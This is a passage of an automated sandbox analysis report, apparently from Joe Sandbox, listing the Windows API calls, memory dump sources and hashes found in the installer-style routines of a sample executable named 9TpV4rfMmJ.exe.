                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                                                                        • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00405340
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                                                                      • ShowWindow.USER32(00000000), ref: 004054FC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                      • String ID: $M$N
                                                                                                                      • API String ID: 2564846305-813528018
                                                                                                                      • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                                                      • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                                                                      • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                                                      • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                                                                      • GetSysColor.USER32(?), ref: 00404738
                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00404759
                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                                                                      • SendMessageW.USER32(00000000), ref: 004047DB
                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                                                                      • SetCursor.USER32(00000000), ref: 0040485A
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                                                                      • SetCursor.USER32(00000000), ref: 00404876
                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                      • String ID: Call$N
                                                                                                                      • API String ID: 3103080414-3438112850
                                                                                                                      • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                      • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                                                                      • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                      • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                      • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                      • String ID: F
                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                      • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                      • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                                                                      • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                      • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                                                                      • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                                                                                        • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                        • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                      • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                                                                                      • wsprintfA.USER32 ref: 00406202
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                                                                      • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                                                                        • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\9TpV4rfMmJ.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                        • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                                                      • API String ID: 2171350718-461813615
                                                                                                                      • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                                                      • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                                                                      • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                                                      • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,00000000,00000000,00425A20,760823A0), ref: 004066A8
                                                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,00000000), ref: 00406779
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                      • API String ID: 4260037668-2091026053
                                                                                                                      • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                                                      • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                                                                      • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                                                      • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                                                                      • GetSysColor.USER32(00000000), ref: 0040455B
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                                                                      • SetBkMode.GDI32(?,?), ref: 00404573
                                                                                                                      • GetSysColor.USER32(?), ref: 00404586
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00404596
                                                                                                                      • DeleteObject.GDI32(?), ref: 004045B0
                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2320649405-0
                                                                                                                      • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                      • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                                                                      • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                      • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                        • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                      • String ID: 9
                                                                                                                      • API String ID: 163830602-2366072709
                                                                                                                      • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                      • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                                                                      • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                      • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76083420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                      • CharNextW.USER32(?,00000000,76083420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                      • CharPrevW.USER32(?,?,76083420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                      • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                      • API String ID: 589700163-2977677972
                                                                                                                      • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                      • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                                                                      • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                      • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                                                                      • GetMessagePos.USER32 ref: 00404E77
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                      • String ID: f
                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                      • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                      • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                                                                      • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                      • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 716612BB: GlobalAlloc.KERNELBASE(00000040,?,716612DB,?,7166137F,00000019,716611CA,-000000A0), ref: 716612C5
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 71662743
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 71662778
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250687189467.0000000071661000.00000020.00000001.01000000.00000004.sdmp, Offset: 71660000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250687139142.0000000071660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687238744.0000000071664000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250687268506.0000000071666000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_71660000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1780285237-0
                                                                                                                      • Opcode ID: 134800d921ea344c168c1145dfb5005017215ff46f274e518432af6befb53b82
                                                                                                                      • Instruction ID: 7460bb0ec78bc17e6a64776020dee9af0a04ebca347013d573fc067ce9c0e388
                                                                                                                      • Opcode Fuzzy Hash: 134800d921ea344c168c1145dfb5005017215ff46f274e518432af6befb53b82
